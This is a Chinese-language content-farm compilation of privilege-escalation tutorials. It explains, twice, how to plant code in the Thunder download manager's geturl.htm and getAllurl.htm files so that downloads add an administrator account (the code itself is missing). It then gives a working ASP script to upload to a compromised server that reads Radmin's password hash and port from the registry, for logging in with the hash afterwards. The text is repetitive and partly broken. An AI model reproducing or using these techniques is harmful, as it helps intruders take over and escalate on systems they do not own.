以下是小编帮大家整理的迅雷提权教程(共含3篇),仅供参考,希望能够帮助到大家。同时,但愿您也能像本文投稿人“fengsheng”一样,积极向本站投稿分享好文章。
当我们使用迅雷下载东西的时候,会调用我们安装迅雷后一个htm文件,去激活htm文件里的一些代码,把我们所下载东西添加到列表当中,所对应的htm文件有2处一处是C:\Program Files\Thunder Network\Thunder\Program\geturl.htm一处是C:\Program Files\T
当我们使用迅雷下载东西的时候,会调用我们安装迅雷后一个htm文件,去激活htm文件里的一些代码,
把我们所下载东西添加到列表当中。
所对应的htm文件有2处一处是C:\Program Files\Thunder Network\Thunder\Program\geturl.htm
一处是C:\Program Files\Thunder Network\Thunder\Program\getAllurl.htm
如果我们想把我们想要的代码添加进去执行了?
我们简单写个代码试试,代码如下:
应该大家都可以看的出,如果我们把这段代码添加到那2个htm文件里,当迅雷下载东西的时候,一样
会去执行我们的代码,
添加一个administrators组的一个用户jieshao
当然,代码大家可以自定义哈。不要被我所禁锢住啦
、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、
测试通过,迅雷版本为5.9.2.927,
7月17日10:13:58
Kindle‘s blog
当我们使用迅雷下载东西的时候,会调用我们安装迅雷后一个htm文件,去激活htm文件里的一些代码,
把我们所下载东西添加到列表当中,
所对应的htm文件有2处一处是C:\Program Files\Thunder Network\Thunder\Program\geturl.htm
一处是C:\Program Files\Thunder Network\Thunder\Program\getAllurl.htm
如果我们想把我们想要的代码添加进去执行了?
我们简单写个代码试试,代码如下:
应该大家都可以看的出,如果我们把这段代码添加到那2个htm文件里,当迅雷下载东西的时候,一样
会去执行我们的代码,
添加一个administrators组的一个用户kindle
当然,代码大家可以自定义的..
测试通过,迅雷版本为5.9.2.927
这里讲下利用Radmin提权教程
下面是Radmin在注册表的相对应的地方:
HKEY_LOCAL_MACHINE\SYSTEM\Radmin\v2.0\Server\Parameters\Parameter//默认密码注册表位置
HKEY_LOCAL_MACHINE\SYSTEM\Radmin\v2.0\Server\Parameters\Port //默认端口注册表位置
以前我们可以用海洋木马所带的功能来读出键值,然后进行转换得到hash值,但是现在有个更方便的东西,把以下代码保存为ASP文件传到服务器上,打开可直接读出Radmin的hash和Radmin服务端口!
<%
'========================================Main======================================
Set WSH= Server.CreateObject(“WSCRIPT.SHELL”)
RadminPath=“HKEY_LOCAL_MACHINE\SYSTEM\Radmin\v2.0\Server\Parameters\”
Parameter=“Parameter”
Port = “Port”
ParameterArray=WSH.REGREAD(RadminPath & Parameter )
Response.write “The Result of Radmin Hash”
Response.write “
”
Response.write Parameter&“:”
'=========== ReadPassWord =========
If IsArray(ParameterArray) Then
For i = 0 To UBound(ParameterArray)
If Len (hex(ParameterArray(i)))=1 Then
strObj = strObj & “0” & CStr(Hex(ParameterArray(i)))
Else
strObj = strObj & Hex(ParameterArray(i))
End If
Next
response.write Lcase(strobj)
Else
response.write “Error! Can't Read!”
End If
Response.write “
”
'=========== ReadPort =========
PortArray=WSH.REGREAD(RadminPath & Port )
If IsArray(PortArray) Then
Response.write Port &“:”
Response.write hextointer(CStr(Hex(PortArray(1)))&CStr(Hex(PortArray(0))))
Else
Response.write “Error! Can't Read!”
End If
'=======================================hex TO int===================================
Function hextointer(strin)
Dim i, j, k, result
result = 0
For i = 1 To Len(strin)
If Mid(strin, i, 1) = “f” or Mid(strin, i, 1) =“F” Then
j = 15
End If
If Mid(strin, i, 1) = “e” or Mid(strin, i, 1) = “E” Then
j = 14
End If
If Mid(strin, i, 1) = “d” or Mid(strin, i, 1) = “D” Then
j = 13
End If
If Mid(strin, i, 1) = “c” or Mid(strin, i, 1) = “C” Then
j = 12
End If
If Mid(strin, i, 1) = “b” or Mid(strin, i, 1) = “B” Then
j = 11
End If
If Mid(strin, i, 1) = “a” or Mid(strin, i, 1) = “A” Then
j = 10
End If
If Mid(strin, i, 1) <= “9” And Mid(strin, i, 1) >= “0” Then
j = CInt(Mid(strin, i, 1))
End If
For k = 1 To Len(strin) - i
j = j * 16
Next
result = result + j
Next
hextointer = result
End Function
'====================================== End ======================================
%>
再利用Radmin的hash版去连接肉鸡,输入所得到的32位hash密码,呵呵,成功提权! 这也是我的第一次提权成功,感觉不错,不过有很大局限性,肉鸡必须装有Radmin......
Radmin提权教程都看明白了吧,radmin提权教程
,不懂?不懂再看啦。。★ 迅雷笔试真题
★ 提成语
★ 书权委托书
★ 探望权起诉状
★ 权亚征文
